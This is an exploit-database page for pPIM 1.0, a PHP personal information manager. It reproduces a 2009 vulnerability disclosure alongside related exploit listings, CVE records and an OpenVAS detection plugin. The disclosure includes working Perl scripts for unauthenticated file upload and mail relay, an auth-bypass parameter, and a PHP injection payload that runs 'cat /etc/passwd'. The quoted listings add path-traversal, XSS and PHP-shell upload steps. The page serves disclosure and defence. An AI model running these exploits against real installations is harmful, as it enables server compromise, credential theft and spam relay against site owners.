Search...

ppim 1.0 - Multiple Vulnerabilities

2009-02-25T00:00:00

ID EDB-ID:8105
Type exploitdb
Reporter Justin Keane
Modified 2009-02-25T00:00:00

Description

pPIM 1.0 Multiple Remote Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit for php platform

                                        
                                            - -= pPIM Multiple Vulnerabilities =-

Version Tested:  pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane &lt;justin@madirish.net&gt;

Description

pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files.  pPIM came to my attention recently with the
publishing on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093).  As there is a
milw0rm exploit already posted it is likely malicious users are already
exploiting pPIM.  I decided to have a closer look at pPIM and, quite
frankly, was horrified by what I found.  pPIM contains multiple
vulnerabilities, from version information leakage, to system credential
disclosure, to remote command execution, authentication bypass and cross
site scripting vulnerabilities.  Possibly the only class of
vulnerability pPIM is not exposed to is SQL injection as it doesn't
employ any database back end.  That said, there seemed to be nothing in
the way of security other than an easily bypassable GET variable check
in the header, present in pPIM.  The following is a brief synopsis of my
findings, although I gave up investigation at after discovering so many
flaws in the application's architecture with respect to security.

Version Information Leakage:

By calling the URL http://target.tld/ppim/Readme.txt you can view the
version information of the installed version of pPIM.

Password Hash Disclosure:

By requesting the URL http://target.tld/ppim/password.dat the password
hash is revealed.  Depending on the hashing algorithm used by PHP this
could be trivially easy to compromise using a password cracking tool
like John the Ripper.

Unauthenticated Password Change:

There is no authentication protection on the password changing script,
so calling

http://target.tld/ppim/changepassword.php

will present an attacker with the password change script and allow
password reset without confirming the existing password.

Multiple Authentication Problems:

Because the authentication takes place in templates/header.html in an
embedded piece of PHP code, depending on server configuration, this code
might not be executed.  Unless the web server is specifically configured
to execute PHP embeded in HTML files server site the PHP code will
instead simply be passed back to clients as actual HTML.

Authentication bypass is possible by simply appending the GET variable
'login=1' to the URL.  For example, to access the Calendar page, calling
the URL 'http://target.tld/ppim/calendar.php' will redirect the
unauthenticated user to the login page.  However, calling the URL
'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated
access to the Calendar.  Any of the pages in pPIM can be accessed this way.

Arbitrary File Upload

pPIM's upload.php script allows attackers to upload arbitrary scripts of
any type to the target server.  To do this using Perl simply create the
file and upload it using Perl:

$ echo "&lt;?php echo phpinfo();?&gt;" &gt; phpinfo.php

The execute the following Perl script:

#!/usr/bin/perl
#
# pPIM Uploader by Justin C. Klein Keane &lt;justin@lampsecurity.org&gt;
# Used to upload the file phpinfo.php to a target pPIM site
# bypassing authentication.
#
# Feb 24, 2009
#
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = LWP::UserAgent-&gt;new();
$request = HTTP::Request-&gt;new();

$response = $ua-&gt;request( POST 'http://target.tld/ppim/upload.php?login=1',
        Content_Type =&gt; 'form-data',
        Content =&gt;
        [
                'submitupload' =&gt; 'submitupload',
                'userfile' =&gt; ['./info.php']
        ],
);
die "Error: ", $response-&gt;status_line unless $response-&gt;is_success;

Unauthorized Email Relay

pPIM's sendmail.php script has absolutely no authentication or
validation, allowing anyone with access to the site to relay e-mail.
The following Perl script will relay email through the pPIM installation:

#!/usr/bin/perl
#
# pPIM Mailer by Justin C. Klein Keane &lt;justin@lampsecurity.org&gt;
# Used to relay mail through any pPIM installation
#
# Feb 24, 2009
#
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = LWP::UserAgent-&gt;new();
$request = HTTP::Request-&gt;new();

$response = $ua-&gt;request( POST 'http://target.tld/ppim/sendmail.php',
        Content_Type =&gt; 'form-data',
        Content =&gt;
        [
                'submitemail' =&gt; 'submitemail',
                'to' =&gt; 'root@localhost',
                'from' =&gt; 'root@localhost',
                'message' =&gt; 'You are just asking for spam!'
        ],
);
die "Error: ", $response-&gt;status_line unless $response-&gt;is_success;

Posting Unauthenticated Notes

The notes.php script fails to check authentication before inserting new
notes.  This allows attackers to post notes without even having to
bypass authentication.  Similarly no authentication is required to
delete notes, allowing unauthenticated attackers to clear all stored notes.

XSS Vulnerability

None of the form fields seem to be adequately scrubbed to prevent Cross
Site Scripting (XSS).  This vulnerability is endemic throughout the
application.  For instance, creating a note with the title
"&lt;script&gt;alert('foo');&lt;/script&gt;" causes a JavaScript alert box to pop up
the word "foo" whenever the Notes screen is accessed.

System Credential Exposure

Because the Email function stores mailbox information as a flat file it
is easy to disclose system account information.  For instance, in pPIM,
if I were to create a new mailbox for root a file called "root.email"
would be created in the email folder.  By calling the URL
http://target.tld/ppim/email/root.email the following output is exposed
via web browser:

&lt;?php
$mailserver = "localhost";
$username = "root";
$password = "root_password";
?&gt;

Thus an attacker that can enumerate (or guess) user accounts for
mailboxes set up via pPIM can easily disclose server location as well as
usernames and passwords. This vulnerability affects all data stored in
pPIM - it can be accessed directly via URL call without any form of
authentication and will expose any material stored in pPIM to users
without authentication.

Arbitrary Command Execution

By creating a specially crafted link an attacker can run arbitrary
commands with the privileges of the web server process.  By altering the
URL field of a link the data files created can be manipulated.  Under
normal usage a user can create a new link under a group, say the
'test_group' with the name 'testlink', the URL '192.168.0.1' and the
description 'test description'.  This file is then stored in pPIM's root
directory under the links/test_group/ directory as testlink.link.
Viewing this file we see:

$ cat testlink.link
&lt;?php
$url="192.168.0.52";
$name="test link";
$description="This is the test link";
?&gt;

This file is included as a PHP include when the note is rendered.
Rudimentary JavaScript provides client side validation of input data,
but if an attacker arbitrarily submitted a form with the following data:

linkname=evil_link&linkurl=";$url=system('cat
/etc/passwd');$foo="&linkdescription=test2&groupname=test+group&linksubmit=Make+Link

The URL variable is overwritten with injected definition.  Looking at
the evil_link.link file created on the filesystem we see:

$ cat evil_link.link
&lt;?php
$url="";$url=system('cat /etc/passwd');$foo="";
$name="evil_link";
$description="test2";
?&gt;

Thus we have arbitrarily overwritten the $url variable and assigned it
the value that returns from the output of our system call.  In fact, now
when a user viewed the Links page they could read the /etc/passwd file
via a web browser.

Conclusions:

I stopped poking at pPIM after gleaning these details as it became
abundantly clear that the application is thoroughly riddled with holes.
 pPIM fails to enforce any security in it's code, and deploying the
application produces a gaping hole in the security of any host.

Recommendations:

Uninstall pPIM immediately!

# milw0rm.com [2009-02-25]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:8105", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ppim 1.0 - Multiple Vulnerabilities", "description": "pPIM 1.0 Multiple Remote Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit for php platform", "published": "2009-02-25T00:00:00", "modified": "2009-02-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8105/", "reporter": "Justin Keane", "references": [], "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "lastseen": "2016-02-01T04:45:11", "viewCount": 10, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-02-01T04:45:11", "rev": 2}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6215", "EDB-ID:6667", "EDB-ID:6231"]}, {"type": "cve", "idList": ["CVE-2008-4427", "CVE-2008-4528", "CVE-2008-4428", "CVE-2008-4425", "CVE-2008-4426"]}, {"type": "openvas", "idList": ["OPENVAS:100005", "OPENVAS:1361412562310100005"]}], "modified": "2016-02-01T04:45:11", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/8105/", "sourceData": "- -= pPIM Multiple Vulnerabilities =-\n\nVersion Tested: pPIM 1.0\nVendor notified\nFull details can also be found at http://www.lampsecurity.org/node/18\nAuthor: Justin C. Klein Keane <justin@madirish.net>\n\nDescription\n\npPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal\nInformation Management application written in PHP that can store\ncontacts (including their photos), events, links, notes, send and check\nemail, and upload files. pPIM came to my attention recently with the\npublishing on Milw0rm of exploit code designed to facilitate remote\ncommand execution (http://www.milw0rm.com/exploits/8093). As there is a\nmilw0rm exploit already posted it is likely malicious users are already\nexploiting pPIM. I decided to have a closer look at pPIM and, quite\nfrankly, was horrified by what I found. pPIM contains multiple\nvulnerabilities, from version information leakage, to system credential\ndisclosure, to remote command execution, authentication bypass and cross\nsite scripting vulnerabilities. Possibly the only class of\nvulnerability pPIM is not exposed to is SQL injection as it doesn't\nemploy any database back end. That said, there seemed to be nothing in\nthe way of security other than an easily bypassable GET variable check\nin the header, present in pPIM. The following is a brief synopsis of my\nfindings, although I gave up investigation at after discovering so many\nflaws in the application's architecture with respect to security.\n\nVersion Information Leakage:\n\nBy calling the URL http://target.tld/ppim/Readme.txt you can view the\nversion information of the installed version of pPIM.\n\nPassword Hash Disclosure:\n\nBy requesting the URL http://target.tld/ppim/password.dat the password\nhash is revealed. Depending on the hashing algorithm used by PHP this\ncould be trivially easy to compromise using a password cracking tool\nlike John the Ripper.\n\nUnauthenticated Password Change:\n\nThere is no authentication protection on the password changing script,\nso calling\n\nhttp://target.tld/ppim/changepassword.php\n\nwill present an attacker with the password change script and allow\npassword reset without confirming the existing password.\n\nMultiple Authentication Problems:\n\nBecause the authentication takes place in templates/header.html in an\nembedded piece of PHP code, depending on server configuration, this code\nmight not be executed. Unless the web server is specifically configured\nto execute PHP embeded in HTML files server site the PHP code will\ninstead simply be passed back to clients as actual HTML.\n\nAuthentication bypass is possible by simply appending the GET variable\n'login=1' to the URL. For example, to access the Calendar page, calling\nthe URL 'http://target.tld/ppim/calendar.php' will redirect the\nunauthenticated user to the login page. However, calling the URL\n'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated\naccess to the Calendar. Any of the pages in pPIM can be accessed this way.\n\nArbitrary File Upload\n\npPIM's upload.php script allows attackers to upload arbitrary scripts of\nany type to the target server. To do this using Perl simply create the\nfile and upload it using Perl:\n\n$ echo \"<?php echo phpinfo();?>\" > phpinfo.php\n\nThe execute the following Perl script:\n\n#!/usr/bin/perl\n#\n# pPIM Uploader by Justin C. Klein Keane <justin@lampsecurity.org>\n# Used to upload the file phpinfo.php to a target pPIM site\n# bypassing authentication.\n#\n# Feb 24, 2009\n#\nuse LWP::UserAgent;\nuse HTTP::Request::Common qw(POST);\n\n$ua = LWP::UserAgent->new();\n$request = HTTP::Request->new();\n\n$response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',\n Content_Type => 'form-data',\n Content =>\n [\n 'submitupload' => 'submitupload',\n 'userfile' => ['./info.php']\n ],\n);\ndie \"Error: \", $response->status_line unless $response->is_success;\n\nUnauthorized Email Relay\n\npPIM's sendmail.php script has absolutely no authentication or\nvalidation, allowing anyone with access to the site to relay e-mail.\nThe following Perl script will relay email through the pPIM installation:\n\n#!/usr/bin/perl\n#\n# pPIM Mailer by Justin C. Klein Keane <justin@lampsecurity.org>\n# Used to relay mail through any pPIM installation\n#\n# Feb 24, 2009\n#\nuse LWP::UserAgent;\nuse HTTP::Request::Common qw(POST);\n\n$ua = LWP::UserAgent->new();\n$request = HTTP::Request->new();\n\n$response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',\n Content_Type => 'form-data',\n Content =>\n [\n 'submitemail' => 'submitemail',\n 'to' => 'root@localhost',\n 'from' => 'root@localhost',\n 'message' => 'You are just asking for spam!'\n ],\n);\ndie \"Error: \", $response->status_line unless $response->is_success;\n\nPosting Unauthenticated Notes\n\nThe notes.php script fails to check authentication before inserting new\nnotes. This allows attackers to post notes without even having to\nbypass authentication. Similarly no authentication is required to\ndelete notes, allowing unauthenticated attackers to clear all stored notes.\n\nXSS Vulnerability\n\nNone of the form fields seem to be adequately scrubbed to prevent Cross\nSite Scripting (XSS). This vulnerability is endemic throughout the\napplication. For instance, creating a note with the title\n\"<script>alert('foo');</script>\" causes a JavaScript alert box to pop up\nthe word \"foo\" whenever the Notes screen is accessed.\n\nSystem Credential Exposure\n\nBecause the Email function stores mailbox information as a flat file it\nis easy to disclose system account information. For instance, in pPIM,\nif I were to create a new mailbox for root a file called \"root.email\"\nwould be created in the email folder. By calling the URL\nhttp://target.tld/ppim/email/root.email the following output is exposed\nvia web browser:\n\n<?php\n$mailserver = \"localhost\";\n$username = \"root\";\n$password = \"root_password\";\n?>\n\nThus an attacker that can enumerate (or guess) user accounts for\nmailboxes set up via pPIM can easily disclose server location as well as\nusernames and passwords. This vulnerability affects all data stored in\npPIM - it can be accessed directly via URL call without any form of\nauthentication and will expose any material stored in pPIM to users\nwithout authentication.\n\nArbitrary Command Execution\n\nBy creating a specially crafted link an attacker can run arbitrary\ncommands with the privileges of the web server process. By altering the\nURL field of a link the data files created can be manipulated. Under\nnormal usage a user can create a new link under a group, say the\n'test_group' with the name 'testlink', the URL '192.168.0.1' and the\ndescription 'test description'. This file is then stored in pPIM's root\ndirectory under the links/test_group/ directory as testlink.link.\nViewing this file we see:\n\n$ cat testlink.link\n<?php\n$url=\"192.168.0.52\";\n$name=\"test link\";\n$description=\"This is the test link\";\n?>\n\nThis file is included as a PHP include when the note is rendered.\nRudimentary JavaScript provides client side validation of input data,\nbut if an attacker arbitrarily submitted a form with the following data:\n\nlinkname=evil_link&linkurl=\";$url=system('cat\n/etc/passwd');$foo=\"&linkdescription=test2&groupname=test+group&linksubmit=Make+Link\n\nThe URL variable is overwritten with injected definition. Looking at\nthe evil_link.link file created on the filesystem we see:\n\n$ cat evil_link.link\n<?php\n$url=\"\";$url=system('cat /etc/passwd');$foo=\"\";\n$name=\"evil_link\";\n$description=\"test2\";\n?>\n\nThus we have arbitrarily overwritten the $url variable and assigned it\nthe value that returns from the output of our system call. In fact, now\nwhen a user viewed the Links page they could read the /etc/passwd file\nvia a web browser.\n\nConclusions:\n\nI stopped poking at pPIM after gleaning these details as it became\nabundantly clear that the application is thoroughly riddled with holes.\n pPIM fails to enforce any security in it's code, and deploying the\napplication produces a gaping hole in the security of any host.\n\nRecommendations:\n\nUninstall pPIM immediately!\n\n# milw0rm.com [2009-02-25]\n", "osvdbidlist": ["56374", "56376", "56375", "56373", "56372", "56371"]}

{"exploitdb": [{"lastseen": "2016-02-01T00:27:01", "description": "Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit f...", "published": "2008-08-10T00:00:00", "type": "exploitdb", "title": "Ppim <= 1.0 Arbitrary File Delete/XSS Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "modified": "2008-08-10T00:00:00", "id": "EDB-ID:6215", "href": "https://www.exploit-db.com/exploits/6215/", "sourceData": "##########################################################\n#Author : BeyazKurt\n#Contact : Djm-sut@Hotmail.Com\n#\n#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]\n#Download : http://scripts.ringsworld.com/organizers/ppim.zip\n#\n# D0rk : inurl:events.php?listallevents\n#\n# File Delete Vulnerability: upload.php\n#\n# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx\n# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName\n#\n# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n#\n# XSS Vulnerability: events.php\n#\n#[CODE]\n# <?php\n# if (isset($_GET['date']))\n# {\n# $date_id = $_GET['date'];\n# print \"<a href=\\\"events.php?mode=new&date=$date_id\\\">New Event</a><br / >\";\n# }\n# ?>\n#[/CODE]\n#\n#Exploit :\n# events.php?mode=new&date=XSS CODE\n# events.php?mode=new&date=\"><script>alert('XSS')</script>\n# -------------------------------\n#\n# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)\n# pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!\n# Proud 2 Be ALBANIAN\n#\n# MTK : 0 - 5 : FenerBah\u0e23\u0083\u0e22\u0e07e (H)\n#\n# Not : Fuck off pala! aq lameri.\n# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.\n#######################################################\n\n# milw0rm.com [2008-08-10]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6215/"}, {"lastseen": "2016-02-01T00:28:54", "description": "Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit for ...", "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Ppim <= 1.0 upload/change password Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:6231", "href": "https://www.exploit-db.com/exploits/6231/", "sourceData": "Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities\ncript : Ppim v1.0\nDownload : http://scripts.ringsworld.com/organizers/ppim.zip\nBy Stack\nPoc 1: change password\nfor change password go to this link\nhttp://localhost/ppim/changepassword.php\nwrithe your password and confirm it\n\nPoc 2 : upload\nhttp://localhost/ppim/upload.php\nyou can upload you php shell in this link\nafter you go here\nhttp://localhost/ppim/shell.php\n\n# milw0rm.com [2008-08-11]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6231/"}, {"lastseen": "2016-02-01T01:21:58", "description": "pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability. CVE-2008-4528. Webapps exploit for php platform", "published": "2008-10-04T00:00:00", "type": "exploitdb", "title": "pPIM 1.01 notes.php id Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4528"], "modified": "2008-10-04T00:00:00", "id": "EDB-ID:6667", "href": "https://www.exploit-db.com/exploits/6667/", "sourceData": "# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability\n# url: http://www.phlatline.org/docs/files/ppim.zip\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n\n\ndescription of vulnerability:\n-----------------------------------------------\nthe variable 'id' has been not defined in code \nand the variable 'id' is sent by the users.\n-----------------------------------------------\n\nvuln file: notes.php\n\nvuln code:\nx: >...\n107: if (isset($_GET[\"mode\"]))\n\n\t {\n\n\t \tif ($_GET[\"mode\"]==\"edit\")\n\n\t\t{\n\n\t\t if (isset($_GET['id']))\n\n\t\t {\n\n\t\t \t$notefile = $_GET['id'];\n\n\t\t\tif ($notefile == \"new\")\n\n\t\t\t{\n\n\t\t\t $title = \"\";\n\n\t\t\t $notes = \"\";\n\n\t\t\t}\n\n\t\t\telse\n\n\t\t\t{\n\n\t\t\t $temp = \"notes/\" . $notefile;\n\n\t\t\t require($temp);\n\n123:\t\t\t}\nx: <...\nx: }}}\n\nexploit: GET /notes.php?mode=edit&id=[file]\nsample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd\n\nlive demo:\nhttp://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php\n\n# milw0rm.com [2008-10-04]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6667/"}], "cve": [{"lastseen": "2021-02-02T05:35:17", "description": "Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action.", "edition": 4, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4426", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4426"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4426", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "changepassword.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier does not require administrative authentication, which allows remote attackers to change arbitrary passwords.", "edition": 6, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4427", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4427"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4427", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Directory traversal vulnerability in notes.php in Phlatline's Personal Information Manager (pPIM) 1.01 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter in an edit action.", "edition": 4, "cvss3": {}, "published": "2008-10-09T18:14:00", "title": "CVE-2008-4528", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4528"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.01"], "id": "CVE-2008-4528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4528", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.01:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Directory traversal vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to delete arbitrary files via directory traversal sequences in the file parameter within a delfile action.", "edition": 4, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4425", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4425"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4425", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4425", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Unrestricted file upload vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier allows remote attackers to execute arbitrary code by uploading a .php file, then accessing it via a direct request to the file in the top-level directory.", "edition": 6, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4428", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4428"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4428", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-08T19:12:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4425"], "description": "This host is running pPIM which is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.", "modified": "2020-05-06T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:1361412562310100005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100005", "type": "openvas", "title": "pPIM Multiple Remote Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# pPIM Multiple Remote Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100005\");\n script_version(\"2020-05-06T08:50:57+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 08:50:57 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 16:07:07 +0100 (Mon, 02 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_cve_id(\"CVE-2008-4425\");\n script_bugtraq_id(30627);\n script_name(\"pPIM Multiple Remote Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.phlatline.org/index.php?page=prod-ppim\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/30627\");\n\n script_tag(name:\"summary\", value:\"This host is running pPIM which is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n\n - steal cookie-based authentication credentials\n\n - delete local files within the context of the webserver process\n\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n\n - change user passwords\");\n\n script_tag(name:\"affected\", value:\"These issues affect pPIM 1.0 and prior versions.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, 